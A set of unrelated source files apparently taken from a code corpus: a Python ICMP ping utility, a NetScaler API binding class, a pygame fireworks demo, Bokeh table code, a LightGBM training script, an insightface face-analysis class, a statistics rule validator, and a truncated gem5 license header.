_calc_pstdev_time(self): pvar = self._calc_sum_square_time() / len(self._timing_list) return pvar**0.5 # Used as 'global' variale so we can print # stats when exiting by signal myStats = MStats2() def _checksum(source_string): """ A port of the functionality of in_cksum() from ping.c Ideally this would act on the string as a series of 16-bit ints (host packed), but this works. Network data is big-endian, hosts are typically little-endian """ if (len(source_string) % 2): source_string += "\x00" converted = array.array("H", source_string) if sys.byteorder == "big": converted.bytewap() val = sum(converted) val &= 0xffffffff # Truncate val to 32 bits (a variance from ping.c, which # uses signed ints, but overflow is unlikely in ping) val = (val >> 16) + (val & 0xffff) # Add high 16 bits to low 16 bits val += (val >> 16) # Add carry from above (if any) answer = ~val & 0xffff # Invert and truncate to 16 bits answer = socket.htons(answer) return answer def single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, myStats=None, ipv6=False, verbose=True, sourceIP=None): """ Returns either the delay (in ms) or None on timeout. """ delay = None if ipv6: try: # One could use UDP here, but it's obscure mySocket = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.getprotobyname("ipv6-icmp")) if sourceIP is not None: mySocket.bind((sourceIP, 0)) mySocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) except OSError as e: if verbose: print("failed. (socket error: '%s')" % str(e)) print('Note that python-ping uses RAW sockets' 'and requiers root rights.') raise # raise the original error else: try: # One could use UDP here, but it's obscure mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp")) if sourceIP is not None: mySocket.bind((sourceIP, 0)) mySocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) except OSError as e: if verbose: print("failed. (socket error: '%s')" % str(e)) print('Note that python-ping uses RAW sockets' 'and requires root rights.') raise # raise the original error my_ID = (os.getpid() ^ get_ident()) & 0xFFFF sentTime = _send(mySocket, destIP, my_ID, mySeqNumber, numDataBytes, ipv6, verbose) if sentTime is None: mySocket.close() return delay, (None,) if myStats is not None: myStats.packet_sent() recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL \ = _receive(mySocket, my_ID, timeout, ipv6) mySocket.close() if recvTime: delay = (recvTime-sentTime)*1000 if ipv6: host_addr = hostname else: try: host_addr = socket.inet_ntop(socket.AF_INET, struct.pack( "!I", iphSrcIP)) except AttributeError: # Python on windows dosn't have inet_ntop. host_addr = hostname if verbose: print("%d bytes from %s: icmp_seq=%d ttl=%d time=%.2f ms" % ( dataSize, host_addr, icmpSeqNumber, iphTTL, delay) ) if myStats is not None: assert isinstance(myStats, MStats2) myStats.packet_received() myStats.record_time(delay) else: delay = None if verbose: print("Request timed out.") return delay, (recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL) def _send(mySocket, destIP, myID, mySeqNumber, numDataBytes, ipv6=False, verbose=True): """ Send one ping to the given >destIP<. """ # destIP = socket.gethostbyname(destIP) # Header is type (8), code (8), checksum (16), id (16), sequence (16) # (numDataBytes - 8) - Remove header size from packet size myChecksum = 0 # Make a dummy heder with a 0 checksum. if ipv6: header = struct.pack( "!BbHHh", ICMP_ECHO_IPV6, 0, myChecksum, myID, mySeqNumber ) else: header = struct.pack( "!BBHHH", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber ) padBytes = [] startVal = 0x42 # 'cose of the string/byte changes in python 2/3 we have # to build the data differnely for different version # or it will make packets with unexpected size. if sys.version[:1] == '2': _bytes = struct.calcsize("d") data = ((numDataBytes - 8) - _bytes) * "Q" data = struct.pack("d", default_timer()) + data else: for i in range(startVal, startVal + (numDataBytes - 8)): padBytes += [(i & 0xff)] # Keep chars in the 0-255 range # data = bytes(padBytes) data = bytearray(padBytes) # Calculate the checksum on the data and the dummy header. myChecksum = _checksum(header + data) # Checksum is in network order # Now that we have the right checksum, we put that in. It's just easier # to make up a new header than to stuff it into the dummy. if ipv6: header = struct.pack( "!BbHHh", ICMP_ECHO_IPV6, 0, myChecksum, myID, mySeqNumber ) else: header = struct.pack( "!BBHHH", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber ) packet = header + data sendTime = default_timer() try: mySocket.sendto(packet, (destIP, 1)) # Port number is irrelevant except OSError as e: if verbose: print("General failure (%s)" % str(e)) return except socket.error as e: if verbose: print("General failure (%s)" % str(e)) return return sendTime def _receive(mySocket, myID, timeout, ipv6=False): """ Receive the ping from the socket. Timeout = in ms """ timeLeft = timeout/1000 while True: # Loop while waiting for packet or timeout startedSelect = default_timer() whatReady = select.select([mySocket], [], [], timeLeft) howLongInSelect = (default_timer() - startedSelect) if whatReady[0] == []: # Timeout return None, 0, 0, 0, 0 timeReceived = default_timer() recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) ipHeader = recPacket[:20] iphVersion, iphTypeOfSvc, iphLength, iphID, iphFlags, iphTTL, \ iphProtocol, iphChecksum, iphSrcIP, iphDestIP = struct.unpack( "!BBHHHBBHII", ipHeader) if ipv6: icmpHeader = recPacket[0:8] else: icmpHeader = recPacket[20:28] icmpType, icmpCode, icmpChecksum, icmpPacketID, icmpSeqNumber \ = struct.unpack("!BBHHH", icmpHeader) # Match only the packets we care about if (icmpType != 8) and (icmpPacketID == myID): dataSize = len(recPacket) - 28 return timeReceived, (dataSize + 8), iphSrcIP, icmpSeqNumber, \ iphTTL timeLeft = timeLeft - howLongInSelect if timeLeft <= 0: return None, 0, 0, 0, 0 def _dump_stats(myStats): """ Show stats when pings are done """ print("\n----%s PYTHON PING Statistics----" % (myStats.thisIP)) print("%d packets transmitted, %d packets received, %0.1f%% packet loss" % (myStats.pktsSent, myStats.pktsRcvd, 100.0 * myStats.fracLoss)) if myStats.pktsRcvd > 0: print("round-trip (ms) min/avg/max = %0.1f/%0.1f/%0.1f" % ( myStats.minTime, myStats.avrgTime, myStats.maxTime )) print(' median/pstddev = %0.2f/%0.2f' % ( myStats.median_time, myStats.pstdev_time )) print('') return def _signal_handler(signum, frame): """ Handle exit via signals """ global myStats _dump_stats(myStats) print("\n(Terminated with signal %d)\n" % (signum)) sys.exit(0) def _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=None, sourceIP=None): single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, verbose=False, sourceIP=sourceIP) time.sleep(0.5) def verbose_ping(hostname, timeout=3000, count=3, numDataBytes=64, path_finder=False, ipv6=False, sourceIP=None): """ Send >count< ping to >destIP< with the given >timeout< and display the result. To continuously attempt ping requests, set >count< to None. To consume the generator, use the following syntax: >>> import ping >>> for return_val in ping.verbose_ping('google.ca'): pass # COLLECT YIELDS AND PERFORM LOGIC. Alternatively, you can consume the generator by using list comprehension: >>> import ping >>> consume = list(ping.verbose_ping('google.ca')) Via the same syntax, you can successfully get the exit code via: >>> import ping >>> consume = list(ping.verbose_ping('google.ca')) >>> exit_code = consume[:-1] # The last yield is the exit code. >>> sys.exit(exit_code) """ global myStats # Handle Ctrl+C signal.signal(signal.SIGINT, _signal_handler) if hasattr(signal, "SIGBREAK"): # Handle Ctrl-Break /Windows/ signal.signal(signal.SIGBREAK, _signal_handler) myStats = MStats2() # Reset the stats mySeqNumber = 0 # Starting value try: if ipv6: info = socket.getaddrinfo(hostname, None)[0] destIP = info[4][0] else: destIP = socket.gethostbyname(hostname) print("\nPYTHON PING %s (%s): %d data bytes" % (hostname, destIP, numDataBytes)) except socket.gaierror as e: print("\nPYTHON PING: Unknown host: %s (%s)" % (hostname, str(e))) print('') return myStats.thisIP = destIP # This will send packet that we don't care about 0.5 seconds before it # starts actually pinging. This is needed in big MAN/LAN networks where # you sometimes loose the first packet. (while the switches find the way) if path_finder: print("PYTHON PING %s (%s): Sending pathfinder ping" % (hostname, destIP)) _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, sourceIP=sourceIP) print() i = 0 while 1: delay = single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, myStats=myStats, sourceIP=sourceIP) delay = 0 if delay is None else delay[0] mySeqNumber += 1 # Pause for the remainder of the MAX_SLEEP period (if applicable) if (MAX_SLEEP > delay): time.sleep((MAX_SLEEP - delay)/1000) if count is not None and i < count: i += 1 yield myStats.pktsRcvd elif count is None: yield myStats.pktsRcvd elif count is not None and i >= count: break _dump_stats(myStats) # 0 if we receive at least one packet # 1 if we don't receive any packets yield not myStats.pktsRcvd def quiet_ping(hostname, timeout=3000, count=3, advanced_statistics=False, numDataBytes=64, path_finder=False, ipv6=False, sourceIP=None): """ Same as verbose_ping, but the results are yielded as a tuple """ myStats = MStats2() # Reset the stats mySeqNumber = 0 # Starting value try: if ipv6: info = socket.getaddrinfo(hostname, None)[0] destIP = info[4][0] else: destIP = socket.gethostbyname(hostname) except socket.gaierror: yield False return myStats.thisIP = destIP # This will send packet that we don't care about 0.5 seconds before it # starts actually pinging. This is needed in big MAN/LAN networks where # you sometimes loose the first packet. (while the switches find the way) if path_finder: _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, sourceIP=sourceIP) i = 1 while 1: delay = single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, myStats=myStats, verbose=False, sourceIP=sourceIP) delay = 0 if delay is None else delay[0] mySeqNumber += 1 # Pause for the remainder of the MAX_SLEEP period (if applicable) if (MAX_SLEEP > delay): time.sleep((MAX_SLEEP - delay) / 1000) yield myStats.pktsSent if count is not None and i < count: i += 1 elif count is not None and i >= count: break elif count is not None: yield myStats.pktsSent if advanced_statistics: # return tuple(max_rtt, min_rtt, avrg_rtt, percent_lost, median, pop.std.dev) yield myStats.maxTime, myStats.minTime, myStats.avrgTime, myStats.fracLoss,\ myStats.median_time, myStats.pstdev_time else: # return tuple(max_rtt, min_rtt, avrg_rtt, percent_lost) yield myStats.maxTime, myStats.minTime, myStats.avrgTime, myStats.fracLoss if __name__ == '__main__': # FIXME: Add a real CLI (mostly fixed) if sys.argv.count('-T') or sys.argv.count('--test_case'): print('Running PYTHON PING test case.') # These should work: for val in verbose_ping("127.0.0.1"): pass for val in verbose_ping("8.8.8.8"): pass for val in verbose_ping("heise.de"): pass for val in verbose_ping("google.com"): pass # Inconsistent on Windows w/ ActivePython (Python 3.2 resolves # correctly to the local host, but 2.7 tries to resolve to the local # *gateway*) for val in verbose_ping("localhost"): pass # Should fail with 'getaddrinfo failed': for val in verbose_ping("foobar_url.fooobar"): pass # Should fail (timeout), but it depends on the local network: for val in verbose_ping("192.168.255.254"): pass # Should fails with 'The requested address is not valid in its context' for val in verbose_ping("0.0.0.0"): pass exit() parser = argparse.ArgumentParser(prog='python-ping', description='A pure python implementation\ of the ping protocol. *REQUIRES ROOT*') parser.add_argument('address', help='The address to attempt to ping.') parser.add_argument('-t', '--timeout', help='The maximum amount of time to\ wait until ping timeout.', type=int, default=3000) parser.add_argument('-c', '--request_count', help='The number of attempts \ to make. See --infinite to attempt requests until \ stopped.', type=int, default=3) parser.add_argument('-i', '--infinite', help='Flag to continuously ping \ a host until stopped.', action='store_true') parser.add_argument('-I', '--ipv6', action='store_true', help='Flag to \ use IPv6.') parser.add_argument('-s', '--packet_size', type=int, help='Designate the\ amount of data to send per packet.', default=64) parser.add_argument('-T', '--test_case', action='store_true', help='Flag \ to run the default test case suite.') parser.add_argument('-S', '--source_address', help='Source address from which \ ICMP Echo packets will be sent.') parsed = parser.parse_args() if parsed.infinite: sys.exit(list(verbose_ping(parsed.address, parsed.timeout, None, parsed.packet_size, ipv6=parsed.ipv6, sourceIP=parsed.source_address))[:-1]) else: sys.exit(list(verbose_ping(parsed.address, parsed.timeout, parsed.request_count, parsed.packet_size, ipv6=parsed.ipv6, sourceIP=parsed.source_address))[:-1])
the-stack_106_24373
# # Copyright (c) 2021 Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response from nssrc.com.citrix.netscaler.nitro.service.options import options from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util class responderpolicy_responderglobal_binding(base_resource) : """ Binding class showing the responderglobal that can be bound to responderpolicy. """ def __init__(self) : self._boundto = None self._priority = None self._activepolicy = None self._gotopriorityexpression = None self._labeltype = None self._labelname = None self._name = None self.___count = None @property def boundto(self) : r"""Location where policy is bound. """ try : return self._boundto except Exception as e: raise e @boundto.setter def boundto(self, boundto) : r"""Location where policy is bound. """ try : self._boundto = boundto except Exception as e: raise e @property def name(self) : r"""Name of the responder policy for which to display settings. """ try : return self._name except Exception as e: raise e @name.setter def name(self, name) : r"""Name of the responder policy for which to display settings. """ try : self._name = name except Exception as e: raise e @property def priority(self) : r"""Specifies the priority of the policy. """ try : return self._priority except Exception as e: raise e @property def labelname(self) : r"""Name of the label to invoke if the current policy rule evaluates to TRUE. """ try : return self._labelname except Exception as e: raise e @property def gotopriorityexpression(self) : r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE. """ try : return self._gotopriorityexpression except Exception as e: raise e @property def labeltype(self) : r"""Type of policy label invocation.<br/>Possible values = reqvserver, resvserver, policylabel. """ try : return self._labeltype except Exception as e: raise e @property def activepolicy(self) : r"""Indicates whether policy is bound or not. """ try : return self._activepolicy except Exception as e: raise e def _get_nitro_response(self, service, response) : r""" converts nitro response into object and returns the object array in case of get request. """ try : result = service.payload_formatter.string_to_resource(responderpolicy_responderglobal_binding_response, response, self.__class__.__name__) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == "ERROR") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.responderpolicy_responderglobal_binding except Exception as e : raise e def _get_object_name(self) : r""" Returns the value of object identifier argument """ try : if self.name is not None : return str(self.name) return None except Exception as e : raise e @classmethod def get(cls, service, name="", option_="") : r""" Use this API to fetch responderpolicy_responderglobal_binding resources. """ try : if not name : obj = responderpolicy_responderglobal_binding() response = obj.get_resources(service, option_) else : obj = responderpolicy_responderglobal_binding() obj.name = name response = obj.get_resources(service) return response except Exception as e: raise e @classmethod def get_filtered(cls, service, name, filter_) : r""" Use this API to fetch filtered set of responderpolicy_responderglobal_binding resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.filter = filter_ response = obj.getfiltered(service, option_) return response except Exception as e: raise e @classmethod def count(cls, service, name) : r""" Use this API to count responderpolicy_responderglobal_binding resources configued on NetScaler. """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.count = True response = obj.get_resources(service, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e: raise e @classmethod def count_filtered(cls, service, name, filter_) : r""" Use this API to count the filtered set of responderpolicy_responderglobal_binding resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.count = True option_.filter = filter_ response = obj.getfiltered(service, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e: raise e class Labeltype: reqvserver = "reqvserver" resvserver = "resvserver" policylabel = "policylabel" class responderpolicy_responderglobal_binding_response(base_response) : def __init__(self, length=1) : self.responderpolicy_responderglobal_binding = [] self.errorcode = 0 self.message = "" self.severity = "" self.sessionid = "" self.responderpolicy_responderglobal_binding = [responderpolicy_responderglobal_binding() for _ in range(length)]
the-stack_106_24376
import pygame,sys,random colors = [ "red","green", "yellow", "orange","turquoise"] fireworks = { "red":"red.png", "turquoise":"blue.png", "orange":"orange.png", "green":"green.png", "yellow":"yellow.png", } class Firework: def __init__(self,y = 590): self.x = random.randint(20,880) self.y = y self.explode_height = random.randint(20,200) self.speed = random.randint(3,9) self.color = random.choice(colors) self.loaded_color = pygame.Color(self.color) self.image = pygame.image.load(fireworks[self.color]) self.exploding = False self.dead = False self.particles = [] self.show_count = 0 def explode(self): for i in range(30): x_pos = self.x + random.randint(-50,50) y_pos = self.y + random.randint(-50,50) rect = pygame.Rect(x_pos, y_pos, 2,2) self.particles.append(rect) def show(self, window): if self.exploding: for particle in self.particles: particle.y += 2 pygame.draw.rect(window, self.loaded_color, particle, 0) self.show_count += 1 if self.show_count > 700: self.dead = True elif self.y > self.explode_height: self.y -= self.speed window.blit(self.image,(self.x,self.y)) else: self.explode() self.exploding = True class FireworksManager: def __init__(self, limit = 10): self.fireworks = [] # takes a Firework class self.limit = limit def show(self,window): if len(self.fireworks) < self.limit: self.fireworks.append(Firework()) for fw in self.fireworks: if fw.dead: self.fireworks.pop(self.fireworks.index(fw)) else: fw.show(window) class Screen: def __init__(self, size, fps = 50): self.running = True self.name = "" self.size = size self.clock = pygame.time.Clock() self.fps = fps self.events = pygame.event.get() self.window = pygame.display.set_mode(self.size) def screen_backend(self): self.clock.tick(self.fps) pygame.display.set_caption(self.name) def exit(self): # exit the screen self.running = False def quit_event(self ): # anticipate a quit event for ev in self.events: if ev.type == pygame.QUIT: pygame.quit() self.running = False sys.exit() def dipslay_widgets(self): pass def show(self): while self.running: self.display_widgets() self.events = pygame.event.get() self.screen_backend() self.quit_event() pygame.display.update() continue
the-stack_106_24380
"""Return data tables. Widgets: - summary_title: Div containing title of summary_table - summary_table: Contains summary statistics for numeric data columns - data_title: Div containing title of data_table - data_table: Contains all rows and columns of dataset """ # %% Imports # Standard system imports # Related third party imports from bokeh.models import ColumnDataSource, DataTable, TableColumn, Div from bokeh.layouts import column # Local application/library specific imports # %% Define tables def data_tables(data, source, summary_list, dataset_name, metadata): """Return data tables summarizing dataset.""" # ------------------------------------------------------------------------- # Setup # ------------------------------------------------------------------------- ml_type = metadata['type'] # Parse summary dictionary and use it to create a ColumnDataSource row_labels = ['Data Type', 'Count', 'Mean', 'STD', 'Min', '25%', '50%', '75%', 'Max'] summary = {'row_labels': row_labels} summary_cols = [TableColumn(field='row_labels', title='Column')] for col_dict in summary_list: summary_cols.append(TableColumn(field=col_dict['column'], title=col_dict['column'], width=len(col_dict['column']))) summary[col_dict['column']] = [ col_dict['data_type'], col_dict['count'], round(col_dict['avg'], 2), round(col_dict['std'], 2), round(col_dict['min'], 2), round(col_dict['25%'], 2), round(col_dict['50%'], 2), round(col_dict['75%'], 2), round(col_dict['max'], 2) ] summary_source = ColumnDataSource(summary) # ------------------------------------------------------------------------- # Widgets # ------------------------------------------------------------------------- # Title for summary table summary_title = Div( text=""" <div style="display: table; height: 50px; overflow: hidden;"> <div style="display: table-cell; vertical-align: middle;"> <h1 class="bokeh_header">Summary Statistics</h1> </div> </div>""", height=50) # Summary table of statistics summary_table = DataTable( source=summary_source, columns=summary_cols, index_position=None, sizing_mode='stretch_width', height=275, autosize_mode="fit_viewport") # Title for data table data_title = Div( text=""" <style> .bokeh_header {font-size: 30px; margin: auto;} </style> """ f""" <div style="display: table; height: 50px; overflow: hidden;"> <div style="display: table-cell; vertical-align: middle;"> <h1 class="bokeh_header">{dataset_name} data</h1> </div> </div>""", height=50) # Data table containing all rows and columns of dataset columns = [TableColumn(field=col, title=col) for col in data.keys()] if ml_type == 'classification': data_table = DataTable( source=source, columns=columns, sortable=True, sizing_mode='stretch_width', autosize_mode="fit_viewport") elif ml_type == 'regression': data_table = DataTable( source=source, columns=columns, sortable=True, sizing_mode='stretch_width', autosize_mode="fit_viewport", height=275) return column(summary_title, summary_table), column(data_title, data_table)
the-stack_106_24382
import os import sys import argparse import pandas as pd import numpy as np import lightgbm as lgb from sklearn.metrics import precision_recall_curve from sklearn.metrics import average_precision_score import random import operator import pickle as pickle import matplotlib.pyplot as plt np.random.seed(1) def load_data(vector_filename, ion_type): # Read file if vector_filename.split(".")[-1] == "pkl": vectors = pd.read_pickle(vector_filename) elif vector_filename.split(".")[-1] == "h5": # vectors = pd.read_hdf(vector_filename, key='table', stop=1000) vectors = pd.read_hdf(vector_filename, key="table") else: print("Unsuported feature vector format") exit(1) # Extract targets for given ion type target_names = list(vectors.columns[vectors.columns.str.contains("targets")]) if not "targets{}".format(ion_type) in target_names: print("Targets for {} could not be found in vector file.".format(ion_type)) print("Vector file only contains these targets: {}".format(target_names)) exit(1) targets = vectors.pop("targets{}".format(ion_type)) target_names.remove("targets{}".format(ion_type)) for n in target_names: vectors.pop(n) # Get psmids psmids = vectors.pop("psmid") return (vectors, targets, psmids) fragtype = "y" nul_cpu = 24 print("loading train data") vectors, targets, psmids = load_data(sys.argv[1], fragtype) print("Splitting up into train and test set...") upeps = psmids.unique() np.random.shuffle(upeps) test_psms = upeps[: int(len(upeps) * 0.3)] train_vectors = vectors[~psmids.isin(test_psms)] train_targets = targets[~psmids.isin(test_psms)] train_psmids = psmids[~psmids.isin(test_psms)] test_vectors = vectors[psmids.isin(test_psms)] test_targets = targets[psmids.isin(test_psms)] test_psmids = psmids[psmids.isin(test_psms)] print("Creating LightGBM datastructures...") data = lgb.Dataset(train_vectors, label=train_targets) datatest = lgb.Dataset(test_vectors, label=test_targets) valid_sets = [datatest] vector_sets = [test_vectors] target_sets = [test_targets] psmid_sets = [test_psmids] print("loading evaluation data") for fn in sys.argv[2:]: vectors, targets, psmids = load_data(fn, fragtype) tmp = lgb.Dataset(vectors, label=targets) valid_sets.append(tmp) psmid_sets.append(psmids) vector_sets.append(vectors) target_sets.append(targets) sys.stderr.write("loading data done\n") tmp2 = pd.DataFrame() tmp3 = pd.DataFrame() tmp3["psmid"] = test_psmids[test_vectors["charge"] == 3] tmp3["target"] = test_targets[test_vectors["charge"] == 3] tmp4 = pd.DataFrame() tmp4["psmid"] = test_psmids[test_vectors["charge"] == 4] tmp4["target"] = test_targets[test_vectors["charge"] == 4] for max_depth in [7, 9, 11]: for num_leaves in [50, 100, 200]: params = {} params["objective"] = "regression" params["metric"] = "l1" params["learning_rate"] = 0.8 # params['sub_feature'] = 1 params["num_leaves"] = num_leaves # params['min_data'] = 50 params["max_depth"] = max_depth num_round = 100 # lgb.cv(param, data, num_round, nfold=5) bst = lgb.train(params, data, num_round, valid_sets=valid_sets) for c in [2, 3, 4]: for i in range(len(valid_sets)): tmp = pd.DataFrame() tmp["psmid"] = psmid_sets[i][vector_sets[i]["charge"] == c] tmp["target"] = target_sets[i][vector_sets[i]["charge"] == c] tmp["prediction"] = bst.predict( vector_sets[i][vector_sets[i]["charge"] == c] ) tmpp = ( tmp.groupby("psmid")[["target", "prediction"]].corr().iloc[0::2, -1] ) print( ">>%i %i %i %i %s" % ( c, i, max_depth, num_leaves, " ".join( [ str(x) for x in np.nanpercentile( tmpp.values, [10, 30, 50, 70, 90] ) ] ), ) ) exit() # bst.save_model('model.txt') print(bst.feature_importance()) model_json = bst.dump_model() print(model_json["tree_info"]) def parseOneTree(root, index, array_type="double", return_type="double"): def ifElse(node): if "leaf_index" in node: return "return " + str(node["leaf_value"]) + ";" else: condition = "arr[" + str(node["split_feature"]) + "]" if node["decision_type"] == "no_greater": condition += " <= " + str(node["threshold"]) else: condition += " == " + str(node["threshold"]) left = ifElse(node["left_child"]) right = ifElse(node["right_child"]) return "if ( " + condition + " ) { " + left + " } else { " + right + " }" return ( return_type + " predictTree" + str(index) + "(" + array_type + "[] arr) { " + ifElse(root) + " }" ) def parseAllTrees(trees, array_type="double", return_type="double"): return ( "\n\n".join( [ parseOneTree(tree["tree_structure"], idx, array_type, return_type) for idx, tree in enumerate(trees) ] ) + "\n\n" + return_type + " predict(" + array_type + "[] arr) { " + "return " + " + ".join(["predictTree" + str(i) + "(arr)" for i in range(len(trees))]) + ";" + "}" ) with open("if.else", "w+") as f: f.write(parseAllTrees(model_json["tree_info"]))
the-stack_106_24383
# -*- coding: utf-8 -*- # @Organization : insightface.ai # @Author : Jia Guo # @Time : 2021-05-04 # @Function : from __future__ import division import collections import numpy as np import glob import os import os.path as osp from numpy.linalg import norm from ..model_zoo import model_zoo from ..utils import face_align from ..utils import ensure_available from .common import Face from ..utils import DEFAULT_MP_NAME __all__ = ['FaceAnalysis'] class FaceAnalysis: def __init__(self, name=DEFAULT_MP_NAME, root='~/.insightface/models', allowed_modules=None): self.models = {} #root = os.path.expanduser(root) #self.model_dir = osp.join(root, name) #self.model_dir = get_model_dir(name, root) self.model_dir = ensure_available('models', name) onnx_files = glob.glob(osp.join(self.model_dir, '*.onnx')) onnx_files = sorted(onnx_files) for onnx_file in onnx_files: if onnx_file.find('_selfgen_')>0: #print('ignore:', onnx_file) continue model = model_zoo.get_model(onnx_file) if allowed_modules is not None and model.taskname not in allowed_modules: print('model ignore:', onnx_file, model.taskname) del model elif model.taskname not in self.models and (allowed_modules is None or model.taskname in allowed_modules): print('find model:', onnx_file, model.taskname, model.input_shape, model.input_mean, model.input_std) self.models[model.taskname] = model else: print('duplicated model task type, ignore:', onnx_file, model.taskname) del model assert 'detection' in self.models self.det_model = self.models['detection'] def prepare(self, ctx_id, det_thresh=0.5, det_size=(640, 640)): self.det_thresh = det_thresh assert det_size is not None print('set det-size:', det_size) self.det_size = det_size for taskname, model in self.models.items(): if taskname=='detection': model.prepare(ctx_id, input_size=det_size, det_thresh=det_thresh) else: model.prepare(ctx_id) def get(self, img, max_num=0): bboxes, kpss = self.det_model.detect(img, max_num=max_num, metric='default') if bboxes.shape[0] == 0: return [] ret = [] for i in range(bboxes.shape[0]): bbox = bboxes[i, 0:4] det_score = bboxes[i, 4] kps = None if kpss is not None: kps = kpss[i] face = Face(bbox=bbox, kps=kps, det_score=det_score) for taskname, model in self.models.items(): if taskname=='detection': continue model.get(img, face) ret.append(face) return ret def draw_on(self, img, faces): import cv2 dimg = img.copy() for i in range(len(faces)): face = faces[i] box = face.bbox.astype(np.int) color = (0, 0, 255) cv2.rectangle(dimg, (box[0], box[1]), (box[2], box[3]), color, 2) if face.kps is not None: kps = face.kps.astype(np.int) #print(landmark.shape) for l in range(kps.shape[0]): color = (0, 0, 255) if l == 0 or l == 3: color = (0, 255, 0) cv2.circle(dimg, (kps[l][0], kps[l][1]), 1, color, 2) #for key, value in face.items(): # if key.startswith('landmark_3d'): # print(key, value.shape) # print(value[0:10,:]) # lmk = np.round(value).astype(np.int) # for l in range(lmk.shape[0]): # color = (255, 0, 0) # cv2.circle(dimg, (lmk[l][0], lmk[l][1]), 1, color, # 2) return dimg
the-stack_106_24384
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import StatisticsValidator from hecatoncheir.exception import ValidationError from hecatoncheir.msgutil import gettext as _ class StatEvalValidator(StatisticsValidator.StatisticsValidator): """Validator for the min/max value v = StatEvalValidator('foo', [u'COL1', '{min} > 100']) s = {'row_count': 100, 'columns': [{ 'column_name': 'COL1', 'min': 101, 'max': 1000, 'cardinality': 10}]} assert v.validate(s) == True """ def __init__(self, label, rule): StatisticsValidator.StatisticsValidator.__init__(self, label, rule) def validate(self, stats): """Validate a min/max rule based the column statistics Args: stats (dict): a table statistics. see Data_Structure.txt for more info. Returns: True if the expression is true, otherwise False. """ # rule: [ column_name, expression ] assert len(self.rule) == 2 assert 'columns' in stats c = None for col in stats['columns']: if col['column_name'] == self.rule[0]: c = col break if c is None: raise ValidationError( _("Column `%s' not found. Check your validation rule again.") % self.rule[0], self.rule) assert 'row_count' in stats assert ('nulls' in c and 'min' in c and 'max' in c and 'cardinality' in c) kv = {'rows': stats['row_count'], 'nulls': c['nulls'], 'min': c['min'], 'max': c['max'], 'cardinality': c['cardinality']} self.statistics[0] += 1 try: s = self.rule[1].format(**kv) except KeyError as e: self.statistics[1] += 1 raise ValidationError( _("Parameter error: ") + "`%s'" % kv, self.rule) try: if eval(s) is False: self.statistics[1] += 1 return False except SyntaxError: self.statistics[1] += 1 raise ValidationError( _("Syntax error: ") + "`%s'" % s, self.rule) return True
the-stack_106_24385
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood # Copyright (c) 2009 The Hewlett-Packard Development Company # Copyright (c) 2010 Advanced Micro Devices, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from slicc.ast.StatementAST import StatementAST class 